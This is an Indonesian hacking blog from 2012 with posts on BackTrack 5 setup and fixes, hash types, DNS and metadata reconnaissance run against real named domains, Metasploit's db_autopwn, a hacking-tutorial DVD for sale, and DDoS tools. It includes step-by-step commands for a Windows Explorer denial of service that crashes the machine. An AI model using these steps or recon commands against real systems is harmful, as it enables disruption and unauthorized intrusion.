Saturday, March 31, 2012

Mengganti Pesan yang mucul pada saat login di BackTrack 5

Mungkin sahabat sering bertemu dengan tulisan-tulisan yang muncul saat berhasil login dan ingin masuk kedalam mode GUI, tulisan itu biasanya seperti ini :


[*] Welcome to the BackTrack 5 Distribution, Codename \"Revolution\"

[*] Official BackTrack Home Page: http://www.backtrack-linux.org

[*] Official BackTrack Training : http://www.offensive-security.com
###################################################################"

[*] To start a graphical interface, type "startx"
[*] The default root password is "toor"

untuk merubah tulisan diatas coba ketikan perintah berikut pada terminal :

root@bt:~# nano /etc/update-motd.d/10-help-text


Sekarang Sahabat bisa mengedit tulisan yang akan muncul pada saat login,;)

Anonymous Browsing di BackTrack

Pernahkah sahabat menyadari bahwa ketika sedang berselancar diInternet Alamat komputer kita diInternet atau IP Address tersimpan dan kapan saja bisa diketahui oleh pemilik situs bahkan orang-orang yang memiliki kepentingan dengan alamat komputer kita, sebuah cara yang lumayan effektif meskipun masih ada cara lain bagi pemilik situs untuk mengetahui Ip Address kita adalah dengan menggunakan Anonymous Browsing. Disini saya akan menggunakan aplikasi yang dibuat memang untuk mengganti Indetitas kita didunia maya yaitu Vidalia dan ditambah lagi Add-ons autoproxy untuk broser Mozilla. Berikut Tutorial Anonymous Browsing di BackTrack.


1. Buka terminal dan install aplikasi Vidalia, pada Package configuration centang postgres lalu Ok.

root@bt:~# apt-get install vidalia


2. Install Ads-ons autoproxy.

Buka Tools > Add-ons > autoproxy


3. Untuk mengaktifkan Anonymous Browsing klik logo autoproxy dibagian kanan atas Browser.

4. Inilah ip address kita yang baru,;)

Tutorial install Google Chrome di BackTrack

Sebenarnya sih saya ngak terlalu suka memakai Google Chrome dikarena penggunaan memory yang sangat banyak jika dijalankan, tapi dikarenakan banyak sahabat yang kesulitan dalam melakukan installasi Google Chrome diBackTrack, sekarang saya kan memberikan tutorial untuk melakukan installasi Google Chrome diBackTrack 5.

1. Buka terminal dan tambahkan repository crome

root@bt:~# echo "deb http://dl.google.com/linux/deb/ stable non-free main" >> /etc/apt/sources.list
root@bt:~# wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -

2. Update Backtrack

root@bt:~# apt-get update

3. Install Google Chrome

root@bt:~# apt-get install google-chrome-stable -y

4. Jika Google Chrome tidak dapat dijalankan sebagai root gunakan perintah dibawah ini.

root@bt:~# sed -i 's/exec.*/& --user-data-dir/g' /usr/bin/google-chrome

Selain cara diatas Google Chrome pada BackTrack bisa diinstall melalui Ubuntu Tweak, Ubuntu Software Center, Synaptic Package Manager, atau mendownload langsung aplikasinya disini.

Friday, March 30, 2012

Menambahkan repository Backtrack 5 di Ubuntu


UPDATE : New Repository

Sejak Backtrack 5 Dirilis banyak sekali yang masih menggunakan Linux selain distro Backtrack tertarik menggunakan Backtrack, oleh karena itu berikut adalah cara menambahkan repository untuk Backtrack Di Ubuntu. Cukup ikuti langkah-langkah dibawah ini :

1. Download terlebih dahulu key dari Backtrack disini.
2. Jalankan System > Administration > Software Sources
3. Pada tab Authentication klik Import Key File... kemudian pilih key yang baru kita download tadi.
4. Kemudian pada tab Other Software pilih Add kemudian masukan satu-satu alamat dibawah ini.

Repository dari official resmi

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

untuk repository dari IDWS

deb http://backtrack.indowebster.com/repo/all revolution main microverse non-free testing
deb http://backtrack.indowebster.com/repo/32 revolution main microverse non-free testing
deb http://backtrack.indowebster.com/repo/source revolution main microverse non-free testing


5. klik close kemudian pada pop up yang muncul klik Reload.
6. Mudah bukan,^^

Script update BackTrack 5 - bt5up.py

Pada tutorial sebelumnya membahas tentang penggunaan script bt5-fixit.sh untuk memperbaiki Bugs pada BackTrack yang dibuat oleh developer OS GnakTrack sekaligus mengucapkan perpisahan kepada pengguna GnackTrack, dikarenakan versi GnackTrack tidak akan di update lagi. Sekarang kita punya 1 script lagi, yang dibuat oleh bl4ck5w4n atau MaXFX, salah seorang dari member Forum BackTrack. bt5up.py script sederhana yang bisa membantu sahabat untuk memperbaiki dan melakukan update terhadap BackTrack. Berikut menu yang akan didapatkan dari script bt5up.py :


1. Update and clean Backtrack.

2. Exploit tools.
   - Metasploit Framework.
   - Exploit-db.
   - SET – Social Engineering Toolkit.
   - Update all.

3. Wireless & Telephony.
   - Aircrack-ng and Airdrop.
   - WarVox.
   - Giskismet.
   - Update all.

4. Web & Database.
   - W3AF.
   - Nikto.
   - Sqlmap.
   - Fimap.
   - JoomScan.
   - WPScan.
   - HexorBase.
   - Update all.

5. Others.
   - Nessus.
   - Wireshark
   - OpenVAS.
   - Nmap
   - Update all.

6. Update All
7. Update Script
8. Changelog
9. Feedback (Gmail)
10. Fix BT5 Bugs/Customize BT5
   - Startx after login
   - Change Login message(motd)
   - Set PulseAudio to autostart
   - Set Wicd autostart

11. Additional Tools
   - Nessus
   - Fern-Wifi-Cracker
   - Install All

Cara menggunakan bt5up.py :

1. Download bt5up.py untuk versi 1.1(support BT5R1) disini dan versi 1.4(support BT5R2) disini.

2. Setelah didownload, ekstrak dan jalankan menggunakan perintah :

root@bt:~# python bt5up.py

3. Cara mudah lainnya untuk menjalankan bt5up.py

root@bt:~# cp bt5up.py /bin/bt5up
root@bt:~# chmod +x /bin/bt5up
root@bt:~# bt5up

Monday, March 26, 2012

Memperbaiki B43 Driver di BackTrack 5 R2

Komputer merek DELL yang saya gunakan kebetulan menggunakan Wireless card dari Broadcom dengan driver B43. Tetapi ketika saya menggunakan wireless untuk Internet biasanya sih sering error, pas dicari tau ternyata masalahnya datang dari Driver yang belum kompatibel. Oleh karena itu berikut adalah cara memperbaiki menurut situs resmi BackTrack.


1. Recompile kernel yang sahabat sedang gunakan.

root@bt:~# apt-get dist-upgrade
root@bt:~# prepare-kernel-sources 
root@bt:~# cd /usr/src/linux
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig

2. Setelah muncul tampilan ncurses menu config, pilih Device Drivers -> Broadcom spesific AMBA.



3. Tambahkan Modul BCMA sebagai module dan "Support for BCMA on PCI-host bus"


4. Setelah itu keluar dari ncurses menu config, dan setelah itu aktifkan kembali kerne package dengan perintah dibawah ini :

root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# make modules_install
root@bt:/usr/src/linux# make install
root@bt:/usr/src/linux# update-initramfs -u
root@bt:/usr/src/linux# update-grub2

5. Setelah selesai restart dengan menggunakan perintah "reboot".

Sunday, March 25, 2012

Memperbaiki Blank Screen setelah startx

Blank Screen setelah mengetikan startx sering didapatkan oleh sahabat yang baru menggunakan BackTrack, biasanya dikarenakan oleh hardware yang tidak support dan sering ditemukan pada pengguna BackTrack 5 R1 dan R2, berikut adalah cara untuk memperbaikinya, semoga membantu sahabat yang memiliki masalah dengan Blank Screen setelah startx.

1. Masukan DVD BackTrack lalu booting.


2. Pada saat grub muncul tekan tombol TAB dan akan muncul tulisan seperti gambar dibawah ini.

> /casper/vmlinuz file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz text splash vga=791--


3. Edit menjadi seperti dibawah

> /casper/vmlinuz file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz xforcevesa noapic noapci nosplash irqpoll --


4. Setelah selesai tekan ENTER dan BackTrack 5 siap digunakan.

Saturday, March 24, 2012

Tipe-tipe Hash

Pasti udah pernah liat kode kaya gini kan, 31d6cfe0d16ae931b73c59d7e0c089c0, sahabat tau artinya? kode tadi adalah salah satu dari jenis kode hash. Dan apa itu Hash? Hash adalah hasil enkripsi dari sebuah password atau informasi yang dianggap penting. Sedangkan Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa menggunakan pengetahuan khusus. Lebih lengkap tentang Enkripsi baca disini.

Berikut adalah tipe-tipe hash yang saya dapatkan informasinya dari blog sahabat postinganane.

1.MD4(Message-Digest algortihm 4)

- MD4 dibuat oleh Ronald Rivest pada Oktober 1990, MD4 sebenarnya adalah hash function yang dipakai sebelum pada MD5, namun karena banyak terdapat kelemahan pada MD4 membuatnya harus digantikan oleh MD5.
- panjang 32 karakter (16 bytes)
- contoh : 31d6cfe0d16ae931b73c59d7e0c089c0

2.MD5(Message-Digest algortihm 5)
- MD5 di desain oleh Ronald Rivest pada tahun 1991 sebagai pengganti hash function  sebelumnya yaitu MD4. Pada tahun 1996 (http://id.wikipedia.org/wiki/MD5)
- Jenis ini digunakan pada phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 32 karakter (16 bytes)
- contoh : c4ca4238a0b923820dcc509a6f75849b

3.MD5($pass.$salt)
- Hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- Digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 32 karakter (16 bytes)
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73

4.MD5($salt.$pass)
- Hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- Digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 32 karakter (16 bytes)
- contoh : f190ce9ac8445d249747cab7be43f7d

5.md5(md5($pass).$salt)
- Digunakan di vBulletin, IceBB dan cms lainnya
- panjang 32 karakter (16 bytes)
- contoh : 6011527690eddca23580955c216b1fd2

6.MD5(WordPress)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg  paling sering dipakai adalah huruf “B”) kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah “12345678″) lalu   dilanjutkan oleh hashnya
- Digunakan di wordpress
- panjangnya 34 karakter (17 bytes)
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

7.MD5(phpBB3)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor “9″), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) kemudian dilanjutkan oleh hashnya
- Digunakan di CMS phpBB 3.x.x
- panjangnya 34 karakter (17 bytes)
- contoh : $H$9123456785DAERgALpsri.D9z3ht120

8.SHA-1(Secure Hash Algorithm)
- Diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 40 karakter (20 bytes)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab

9.SHA-256(Secure Hash Algorithm)
- hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…

10.SHA-512(Secure Hash Algorithm)
- hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah “12345678″) lalu dilanjutkan oleh karakter “$” kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…

11.Base64
- algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan “=”
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=

DNSWalk

Aplikasi dnswalk dapat digunakan untuk mencari informasi tentang daftar dari alamat IP dan hostname yang berhubungan yang terdapat didalam DNS server target. Bekerja dengan memanfaatkan fungsi DNS zone transfer.

Cara kerja DNS zone transfer adalah dengan menduplikasi database DNS dari server DNS yang asli kepada server DNS yang lain atau biasa disebut dengan istilah slave DNS server.
Dengan cara ini, database dari server DNS yang asli dan slave DNS server akan saling menyamakan data. Proses menyamakan ini lah yang pada DNS protokol bisa digunakan oleh hacker untuk mendapatkan informasi dari domain target.

Disamping sebagai DNS zone Transfer, dnswalk juga dapat mengecek kosisten dan akurasi dari database DNS. Berikut adalah cara menggunakan dnswalk untuk untuk mendapatkan informasi dari domain target :

root@bt:~# cd /pentest/enumeration/dns/dnswalk
root@bt:/pentest/enumeration/dns/dnswalk# ./dnswalk [domain target].
root@bt:/pentest/enumeration/dns/dnswalk# ./dnswalk kaskus.us.


Dari hasil diatas bisa kita ketahui bahwa sekarang tidak semua konfigurasi server DNS mengaktifkan zone transfer. Fungsi zone transfer sekarang dapat dimonitor oleh banyak administrator server DNS dan diubah cara kerjanya menjadi alaram ketika menerima serangan. Sebagai pengalaman tehnik ini digunakan sebagai pilihan terakhir jika sudah tidak ada jalan lagi.

Metagoofil

Metagoofil adalah sebuah aplikasi untuk Mesin pencarian Google untuk mendapatkan metadata dari file dokumen yang tersedia pada domain target. Berikut adalah tipe file dokumen yang dapat didukung :

- Dokumen Word (doc, odt, docx)
- Dukumen Exel (xls, ods, xlsx)
- File Presentasi (ppt, odp, pptx)
- File PDF (pdf)

Cara kerja Metagoofil adalah seperti berikut :

- Melakukan pencarian untuk semua format file dari target domain menggunakan mesin pecarian Google.
- Mendownload semua format file yang ditemukan dan disimpan kedalam Hardisk kita.
- Mengekstrak metadata dari file dokumen yang kita download.
- Menyimpan hasil kedalam file HTML.

Untuk metadata yang didapatkan biasanya berisi username, bagian-bagian file, dan MAC Address. Informasi ini nantinya akan digunakan untuk membantu kita melakukan penetrasi.

Berikut adalah cara menggunakan Metagoofil :

1. Masuk kedalam folder Metagoofil.

root@bt:~# cd /pentest/enumeration/google/metagoofil/


2. Misalnya kita akan melakukan pencarian file dokumen microsoft dari situs aslinyanya menggunakan perintah berikut :

root@bt:/pentest/enumeration/google/metagoofil# ./metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f hasil.html


3. Setelah pencarian buka menggunakan file manager di /proc/15453/cwd/ maka sahabat akan mendapatkan file yang telah didownload dari hasil Metagoogfil.

Saturday, March 17, 2012

Memperbaiki error pada msfupdate

setelah fix memperbaiki error pada db_autopwn sekarang saya menemukan masalah lagi yaitu mendapatkan error pada saat melakukan update menggunakan msfupdate, berikut error yang saya dapat :

svn: /opt/framework/lib/libssl.so.0.9.8: no version information available (required by /opt/framework/lib/libserf-0.so.0)
svn: /opt/framework/lib/libcrypto.so.0.9.8: no version information available (required by /opt/framework/lib/libserf-0.so.0)
svn: /opt/framework/lib/libssl.so.0.9.8: no version information available (required by /opt/framework/lib/libserf-0.so.0)
svn: /opt/framework/lib/libcrypto.so.0.9.8: no version information available (required by /opt/framework/lib/libserf-0.so.0)


Untuk memperbaikinya sahabat bisa menggunakan cara berikut ini :

root@bt:~# cd /opt/framework/lib/
root@bt:/opt/framework/lib# mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
root@bt:/opt/framework/lib# mv libssl.so.0.9.8 libssl.so.0.9.8-backup
root@bt:/opt/framework/lib# ln -s /usr/lib/libcrypto.so.0.9.8
root@bt:/opt/framework/lib# ln -s /usr/lib/libssl.so.0.9.8
root@bt:/opt/framework/lib# 

Kalau berhasil jangan lupa komen y,:)

Menambahkan module db_autopwn pada Metasploit

Pada waktu ingin menjalankan serangan menggunakan db_autopwn pada metasploit saya mendapat error yaitu file db_autopwn tidak terdapat pada kumpulan plugins metasploit, sehingga untuk memperbaikinya saya harus menambahkannya secara manual, berikut adalah error yang saya dapat ketika menjalankan db_autopwn :

msf > db_status
[*] postgresql connected to msf3
msf > load db_autopwn
[-] Failed to load plugin from /opt/framework/msf3/plugins/db_autopwn: no such file to load -- /opt/framework/msf3/plugins/db_autopwn
msf >


Dan sekarang kita akan menambahkan module db_autopwn secara manual agar dapat digunakan untuk melakukan serangan,:)

1. Update dahulu aplikasi Metasploit kita.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# svn update
Updated to revision 14974.
root@bt:/pentest/exploits/framework# 

2. Download file db_autopwn disini.http://www.mediafire.com/?9cwwdeaa1jc4t55

3. Copy file db_autopwn yang baru saja didownload kedalam folder /pentest/exploits/framework/plugins

4. Restart dan db_autopwn siap digunakan,;)

Wednesday, March 14, 2012

Jual DVD Tutorial Hacking

Seperti yang sahabat lihat dari judul diatas saya sekarang menjual DVD Tutorial, semua tutorial saya pastikan sangat dibutuhkan oleh sahabat-sahabat yang sedang mulai untuk mempelajari backtrack, metasploit, wireless hacking, dan masih banyak lagi. Semua tutorial berisi informasi yang up to date dan tehnik-tehnik dari dasar hingga tingkat yang lebih Experts. Berikut daftar tutorial yang akan sahabat dapatkan :


1. Metasploit Framework Expert
Video yang membahas tentang Metasploit Framework secara mendalam.

- Exploitation Basics
- Why Metasploit?
- Meterpreter Basics
- Armitage
- Framework Organization
- Post Exploitation Kung-Fu
- Post Exploitation Privilege Escalation
- Killing AV and Disabling Firewall
- Stdapi and Priv Extensions
- Token Stealing and Incognito
- Espia and Sniffer Extensions in Post Exploitation
- Post Exploitation Backdoors
- Pivoting after Post Exploitation
- Port Forwarding as part of Post Exploitation
- Client Side Exploits
- Backdoors and Rootkits in Post Exploitation
- Exploit Research with Metasploit
- Railgun Basics
- Railgun Adding Functions
- Railgun Adding New DLLs
- Railgun Adding New DLLs on Windows 7
- Resource Scripts
- Database Support
- Using Plugins
- Meterpreter API Basics
- Meterpreter Scripting Migrate Clone
- Meterpreter Scripting Process Name Search

2. Wireless LAN Security and Penetration Testing
Video yang membahas tentang dasar-dasar Wireless sampai dengan penetrasi menggunakan tehnik sniffing, injeksi, cracking, dan masih banyak lagi tehnik serangan terhadap wireless.

- Getting Started
- Bands, Channels and Sniffing
- Pwning Beacon Frames
- Dissecting AP-Client Connections
- Dissecting WLAN Headers
- Pwning Hidden SSIDs
- Laughing Off MAC Filters
- Hacking WLAN Authentication
- Hotspot Attacks
- Hacking Isolated Clients
- Alfa Card Kung-Fu
- Man-in-the-Middle Attack
- SSL MITM Attack Over Wireless
- SSL MITM Attack Over Wireless Demo
- SSL Man-in-the-Middle Attacks
- Custom Wireless Regulation Database
- WEP In-Depth
- WEP Cracking
- Caffe Latte Attack Basics
- Caffe Latte Attack Demo
- Caffe Latte Attack on the iPhone
- KoreK's ChopChop Attack
- Fragmentation and Hirte Attack
- Understanding WPA/WPA2
- Wi-Fi Challenge 1 (Level Easy) : There is no Patch for Stupidity!
- Wi-Fi Challenge 1 Solution : There is no Patch for Stupidity!
- Wi-Fi Challenge 2 (Level - Intermediate) : Know Thy Packets
- Wi-Fi Challenge 2 Solution : Know Thy Packets
- Wi-Fi Challenge 3 (Level Advanced): Never Underestimate your Enemy!
- WPA-PSK
- WPA-PSK Cracking
- WPA2-PSK Cracking
- Speeding up WPA/WPA2 PSK Cracking
- Never Underestimate Your Enemy!
- Mood Swings of a Wandering Client
- Cracking WPA/WPA2-PSK with just the Client
- Questions and Answers
- Wpa_Supplicant
- Crack WPA-Personal with only AP
- Setting up FreeRadius-WPE on Backtrack
- EAP-MD5 Basics and Demo
- Cracking EAP-MD5 with Eapmd5pass and Eapmd5crack
- EAP Types and PEAP Demo
- Cracking PEAP
- Cracking PEAP in a Windows Network
- Cracking EAP-TTLS
- Insecurity in 3rd Party Wi-Fi Utilities
- Conclusion and the Road Ahead
- Windows Wireless Kung-Fu (SWSE Addendum 1)
- Creating Wireless Backdoors (SWSE Addendum 2)
- Malware, Metasploit and the Hosted Network (SWSE Addendum 3)
- SecurityTube Certified Wi-Fi Security Expert (SWSE) Student Portal Launch

3. Exploit Research
Video yang membahas tentang bagaimana cara membuat kode-kode exploitasi dari memanfaatkan kelemahan pada aplikasi.

- Topic Introduction
- Memcpy Buffer Overflow
- Strcpy Buffer Overflow
- Minishare Buffer Overflow
- FreeSSHD Buffer Overflow
- SEH Basics
- Overwrite SEH
- Exploiting SEH
- Guest Lecture by Andrew King
- Binary Diffing Microsoft Patches

4. Metasploit Tutorial
Video yang membahas tentang menggunakan Metasploit dari awal,sampai dengan menulis skrip dan modul meterpreter.

- Exploitation Basics and need for Metasploit
- Getting Started with Metasploit
- Meterpreter Basics and using Stdapi
- Meterpreter Extensions Stdapi and Priv
- Understanding Windows Tokens and Meterpreter Incognito
- Espia and Sniffer Extensions with Meterpreter Scripts
- Metasploit Database Integration and Automating Exploitation
- Post Exploitation Kung Fu
- Post Exploitation Privilege Escalation
- Post Exploitation Log Deletion and AV Killing
- Post Exploitation and Stealing Data
- Post Exploitation Backdoors and Rootkits
- Post Exploitation Pivoting and Port Forwarding
- Backdooring Executables
- Auxiliary Modules
- Pass the Hash Attack
- Scenario Based Hacking

5. Windows Assembly Language for Hackers
Video yang membahas tentang cara menulis kode exploit menggunakan bahasa assembly untuk sistem operasi windows.

- Processor Modes
- Protected Mode Assembly
- Win32 ASM using MASM32
- MASM Data Types
- Procedures
- Macros
- Program Control using JMP
- Decision Directives
- Loops

6. Assembly Language for Linux
Video yang membahas tentang cara menulis kode exploit menggunakan bahasa assembly untuk sistem operasi Linux.

- System Organization
- Virtual Memory Organization
- GDB Usage Primer
- Hello World
- Data Types
- Moving Data
- Working with Strings
- Unconditional Branching
- Conditional Branching
- Functions
- Functions Stack

7. Buffer Overflow Exploitation for Linux
Video yang membahas tentang cara dasar buffer overflows dan melakukan exploitasi terhadap sistem operasi Linux.

- Smashing the Stack
- Writing Exit Shellcode
- Executing Shellcode
- Disassembling Execve
- Shellcode for Execve
- Exploiting a Program
- Exploiting a Program Demo
- Return to Libc Theory
- Return to Libc Demo

8. Format String Vulnerabilities
Video yang membahas tentang cara memanfaatkan kelemahan dalam format penulisan kode program dan mengexploitasinya.

- The Basics
- Understanding Format Functions
- Crashing the Program
- Viewing the Stack

9. Scenario Based Hacking and Penetration Testing
Video yang membahas tentang skenario dari tehnik hacking.

- No Patches, No AV, Direct Access
- No Patches, No AV, Behind NAT
- OS Patched, No AV, Behind NAT
- OS and Software Patched, No AV, Behind NAT

10. Router Hacking Series
Video yang membahas tentang cara melakukan hacking kepada router.

- The Basics
- Service Enumeration, Fingerprinting and Default Accounts
- Bruteforcing and Dictionary Attacks with Hydra
- SNMP Attacks using SNMPCheck
- SNMP Attacks using SNMPEnum
- Dictionary Attack using Metasploit on SNMP

Cukup dengan Rp. 100.000 [ belum ongkir ] sahabat bisa mendapatkan video tutorial diatas,:)


BERMINAT SILAHKAN MEMESAN MELALUI ALAMAT DIBAWAH INI :

Telp : 087821491894
Email : gilakomputer@gmail.com
facebook : www.facebook.com/octopurba
twitter : @octopurba
yahoo : kodokpink@yahoo.com
website : www.gilakomputer.net
untuk daerah bandung bisa COD sambil kenalan,:)

CARA PEMBAYARAN :

1. Kirim pesan melalui email, sms, facebook, twitter kepada alamat yang diatas dengan format sebagai berikut : NAMA#PESANAN#ALAMAT mis : Octopurba#DVD Tutorial Hacking#jln. kolonel msturi no 288 parompong bandung

2. Setelah mendapat balasan, Lakukan pembayaran dengan mentransfer unag pada rekening sesuai balasan dari saya.
3. Setelah pembayaran diterima barang akan langsung dikirimkan, jika pembayaran dilakukan pada lebih dari jam 1 sore, maka pengiriman akan dilakukan keesokan harinya.

PERATURAN :

1. Penggiriman menggunakan Jasa JNE dan TIKI.

2. Agar tidak mengecewakan sahabat, saya selalu melakukan cek ulang kepada setiap DVD yang saya kirimkan, dan apa bila terjadi kerusakan seperti corrupt, file tidak terbaca, kerusakan selain pada fisik DVD, maka saya wajib mengganti dengan tambahan 1 DVD BackTrack baru untuk versi yang berbeda dan ongkos kirim ditanggung sahabat.

3. Jika terjadi kerusakan pada fisik maka sahabat langsung berurusan dengan pihak pengiriman barang.

4. Pengiriman barang hanya dilakukan pada hari senin - jum'at, jika pemesanan dilakukan terakhir pada hari jum'at maka barang akan dikirimkan pada hari senin.

5. Peraturan bisa berubah menyesuaikan dengan masalah yang terjadi.

Tuesday, March 13, 2012

Anonymous OS

Satu lagi OS linux khusus penetrasi baru yang sahabat bisa gunakan untuk melakukan kegiatan hacking. Anonymous Linux dibuat dengan based ubuntu 11.10 dan DE(Desktop Environment) Mate Desktop buat lebih kepada hacking untuk webserver. Pada Anonymous OS driver untuk Broadcom bcm43xx sudah include dan lebih mantap lagi dengan adanya aplikasi-aplikasi seperti berikut :


- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- TorsHammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap

dan masih banyak lagi..

Download : http://sourceforge.net/projects/anonymous-os/
Website : http://anonymous-os.tumblr.com/

Saturday, March 10, 2012

Scan Peretas dengan AutoScan

AutoScan adalah sebuah tool/aplikasi untuk melakukan scanning dijaringan. Tidak dibutuhkan konfigurasi yang banyak untuk menggunakannya melakukan scanning dijaringan. Dengan autoscan yang memiliki banyak fungsi selain kita bisa melakukan scanning terhadap jaringan, juga bisa mendekteksi peretas yang sedang melakukan hacking, berikut fungsi-fungsi yang akan sahabat dapatkan menurut situs resminya :

- Fast network scanner
- Automatic network discovery
- TCP/IP scanner
- Wake on lan functionality
- Multi-threaded Scanner
- Port scanner
- Low surcharge on the network
- VNC Client
- Telnet Client
- SNMP scanner
- Simultaneous subnetworks scans without human intervention
- Realtime detection of any connected equipment
- Supervision of any equipment (router, server, firewall...)
- Supervision of any network service (smtp, http, pop, ...)
- Automatic detection of known operatic system (brand and version), you can also add any unknown equipment to the database
- The graphical interface can connect one or more scanner agents (local or remote)
- Scanner agents could be deployed all over the network to scan through any type of equipment (router, NAT, etc)
- Network Intruders detection (in intruders detection mode, all new equipments blacklisted)
- Complete network tree can be saved in a XML file.
- Privileged account is not required

1. Buka AutoScan BackTrack > Information Gathering > Network Analysis > Network Scanners > autoscan


2. Pada Network Wizard klik Forward untuk melanjutkan


3. Setting konfigurasi seperti dibawah ini


4. Pilih Localhost lalu klik Forward


5. Pilih kartu jaringan yang ingin digunakan


6. Klik Forward


7. Maka akan tampil semua komputer maupun device yang terkoneksi, untuk monitor jaringan dari peretas klik Intrusion Alert lalu klik yes.


Jika ada satu komputer maupun device yang melakukan kegiatan penetrasi maka AutoScan akan memberikan alert.

Menulis Disini


Kabar gembira buat sahabat yang tulisannya ingin ditampilkan di www.gilakomputer.net bisa mengirimkan tulisannya melalui form dibawah ini. Setelah saya review maka tulisan tersebut akan segera ditampilkan, pada setiap artikel yang ditampilkan saya wajib menampilkan link dari blog/website penulis yang tulisannya ditampilkan di www.gilakomputer.net. Untuk Aturan penulisan adalah sebagai berikut :

Aturan menulis di www.gilakomputer.net :

1. Tulisan harus original.
2. Tulisan harus membahas Tutorial, Backtrack, Hacking, Exploit, Dos, Linux dan yang berkaitan.
3. Dilarang copy paste mentah-mentah milik orang lain, juga sertakan link sumber.
4. Sertakan link alamat blog/website sahabat untuk tulisan yang dikirimkan.

Jadi tunggu apa lagi, selamat menulis,:)

Form Input Artikel
Nama *
Email *
Subjek *

Pesan *


Upload File


Powered byEMF HTML Form
Report Abuse

Request Tutorial


Buat sahabat yang ingin Request Tutorial di www.gilakomputer.net bisa memberikan komentar dikotak kontar yang dibawah ini. Tutorial yang sahabat bisa minta untuk ditampilkan haruslah seputar BackTrack, Hacking, Tutorial, Ulasan Aplikasi, dan segala sesuatu yang berkaitan. Jika sahabat memiliki pertanyaan, sahabat bisa mengirimkan pertanyaan melalui email ke gilakomputer@gmail.com. Dan jika sahabat tertarik untuk menulis di www.gilakomputer.net klik disini.

MS11-077 .fon Kernel-Mode Buffer Overrun PoC


Kode Exploitasi ini dibuat oleh Byoungyoung Lee bisa dikatakan risk karena dapat mangakibatkan komputer menjadi bluescreen, menurut blog pribadinya kode exploit ini dibuat berdasarkan CVE dari Font Library File Buffer Overrun Vulnerability – CVE-2011-2003 untuk info lebih lanjut berkunjunglah ke sini. Pada exploit-db file font ini bisa didownload di sini, extrak dan jalankan untuk melihat efek yang dihasilkan,:)

Windows Explorer Denial Of Sevice (DOS)

Kemarin Berkunjung ke Exploit-db dan saya menemukan sebuah tehnik exploitasi Denial Of Service pada Windows 2008 SP2 RC2 Explorer dan Windows 7 Pro SP1 Explorer. Hanya dengan membuat folder dan menghapusnya bisa membuat komputer crash dan bluescreen. Berikut adalah cara melakukan DOS berdasarkan arsip exploit-db http://www.exploit-db.com/exploits/18272/.


1. Buka Command Prompt, Start > All Programs > Accessories > Command Prompt atau Tekan tombol Windows + R bersamaan kemudian ketik cmd dan enter.
2. Buat folder baru pada drive C dengan nama trigger_alt

mkdir c:\trigger_alt

2. Masuk kedalam folder c:\trigger_alt dan buat folder ....\

cd c:\trigger_alt
mkdir ....\

3. Buka My Computer, Start > My Coomputer > Drive C:
4. Klik kanan dan hapus folder trigger_alt

Sahabat bisa mendownload file exploit ini dari exploit-db di sini. Jika sahabat menggunakan windows  selain yang ada diatas explorer hanya akan mengalami error pada aplikasi saja tetapi tidak sampai mengalami bluescreen.

Thursday, March 8, 2012

Ebook Pemograman Dengan Bahasa Assembly


Bahasa Assembly wajib dikuasai oleh sahabat yang ingin menjadi exploiter(mungkin sebutan untuk orang yang membuat kode exploit), karena bahasa assembly lebih powerfull untuk memanipulasi sistem komputer dibanding bahasa pemograman tingkat tinggi yang sudah ada saat ini. Ebook ini ini membahas secara detail untuk baik teori pemograman assembly serta sorce code yang dapat dipraktekan secara langsung. Saya sangat merekomendasikan ebook ini sebelum belajar membuat kode exploit yang dibahas pada buku The Shellcoders Handbook 2nd Edition.

